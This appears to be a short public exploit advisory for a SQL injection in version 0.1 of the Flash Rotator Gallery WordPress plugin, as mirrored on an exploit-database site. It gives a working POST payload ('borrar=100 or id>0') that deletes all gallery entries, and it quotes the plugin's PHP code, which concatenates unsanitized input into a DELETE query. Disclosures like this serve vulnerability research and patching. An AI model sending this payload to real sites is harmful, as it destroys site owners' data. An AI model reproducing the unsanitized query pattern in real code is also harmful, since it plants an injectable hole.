###########################

# WordPress plugin Flash Rotator Gallery SQL injection 

###########################

# Exploit Title: WordPress plugin Flash Rotator Gallery - SQL injection
# Date: 2017-03-12
# Exploit Author: malwrforensics
# Vendor Homepage: http://www.webpsilon.com/wordpress-plugins/flash-rotator-gallery/
# Software Link: https://downloads.wordpress.org/plugin/flash-rotator-gallery.zip
# Version: 0.1
# Tested on: Linux

HTTP request data:

POST http://192.168.205.102/wordpress/wp-admin/admin.php?page=flash_rotator_gallery.php HTTP/1.1
<snip>

borrar=100+or+id>0 #delete all entries


Technical details:
Affected file: flash-rotator-gallery.php
<snip>

if(isset($_POST['borrar'])) {
$sql = "DELETE FROM $table_name WHERE id = ".$_POST['borrar'].";"; #$_POST['borrar'] is not sanitized
$wpdb->query($sql);

<snip>

Thanks.



###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2017-03-14]

###########################